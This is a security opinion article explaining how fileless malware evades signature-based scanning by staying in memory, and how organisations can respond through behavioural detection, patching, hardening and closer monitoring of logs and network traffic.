Maksim Kabakou - Fotolia
From an attacker’s point of view, there is often a direct correlation between likelihood of success and ability to evade detection. In other words, flying under the radar of their victims’ detection capabilities gives attackers an advantage.
That probably sounds obvious to most people – maybe even to the point of being trite – but it has a few less directly intuitive ramifications that are useful for organisations to know about.
For example, one of the current trends in the evolution of attacker “tradecraft” (the tools and methods attackers use to carry out their activities) is a surge in so-called fileless malware. This is malware that – exactly as you would expect, given the name – operates (propagates, executes and performs whatever function it’s programmed to do) entirely in volatile memory.
It purposely avoids – ideally entirely – interacting with the filesystem, both in terms of how it is transmitted, and also in how it operates. Why does it do this? To maximise the likelihood of remaining undetected.
Keeping off the filesystem helps avoid detection as a byproduct of the manner in which many anti-malware tools operate. Specifically, at a fundamental level, many anti-malware tools operate in a manner analogous to the Unix/Linux search tool grep. This means they search through files looking for pattern matches (signatures of known malware) and alert when they find something that matches.
To the degree that malware can perform its tasks without creating a filesystem record, doing so gives the scanning tools much less to work with. This means that the malware can operate undetected for longer, and so have more time to accomplish its goal.
There are a few reasons why this should matter for organisations. First and foremost, it means the organisation may need to re-evaluate existing tools: which tools it is using and how it employs them. For example, some have said that existing tools become “valueless” in a fileless context. This is purposely hyperbolic to emphasise the point, but it is not entirely accurate.
This is because many anti-malware tools have other non-signature-based detection capabilities, such as heuristics or behavioural analysis, that can be employed in parallel with file system scanning. But this is still important to pay attention to, because using those features can require specific action on the part of the user. That means it is incumbent upon users to make sure additional functionality is included in the tools they employ and, assuming it is, to ensure it is enabled and configured.
Read more Security Think Tanks articles about fileless malware
- How to tackle fileless malware attacks.
- Social engineering at the heart of fileless malware attacks.
- Aim to detect and contain fileless malware attacks quickly.
- Multi-layered security key to fileless malware defence.
- Use layered security and patch management to defeat fileless malware.
- Human, procedural and technical response to fileless malware.
- Patch, scan and lock down to counter fileless malware.
The point is that there are ways that existing anti-malware tools can still help, so it is not a “slash and burn what you’re using now” scenario. Also, fileless is still the minority. It is increasing, but it is still less frequent than other attacks.
For example, Barkly and Ponemon’s 2017 study State of endpoint security risk forecasts that in 2018, the percentage of fileless attacks will rise to 35%. While that is significant – and needs paying attention to – it also means existing file scanning approaches are not dead just yet.
However, it is important to recognise that this trend signifies a very real shift from a practical point of view – at least if we are going to keep our organisations protected in the best way possible. The fact that there is less ability for scanning products to operate optimally in a fileless context increases the importance of other protection methods and security hygiene practices to pick up the slack.
First, by ensuring that devices and the software they run are appropriately patched where possible, and that they are configured correctly and hardened. Second, it means using other types of detective controls where we can and being smart about how we use them. This could include increasing the scrutiny we give network traffic and increasing our attention to logs and alerts.
Lastly, to the extent that we can, stay alert to attacker activity – for example, being alert to adversary motivations, tradecraft and targets, and marrying that understanding to our systematic and workmanlike analysis and inspection of the environment.
At the end of the day, though, a good starting point is just having an awareness that the issue exists. This gives us the ability to plan around the issue and ensure we are getting the most from the tools we use and the protections we have in place. It might cause us to ask pointed questions about the products and tools we use – and rethink how we approach monitoring within our environments.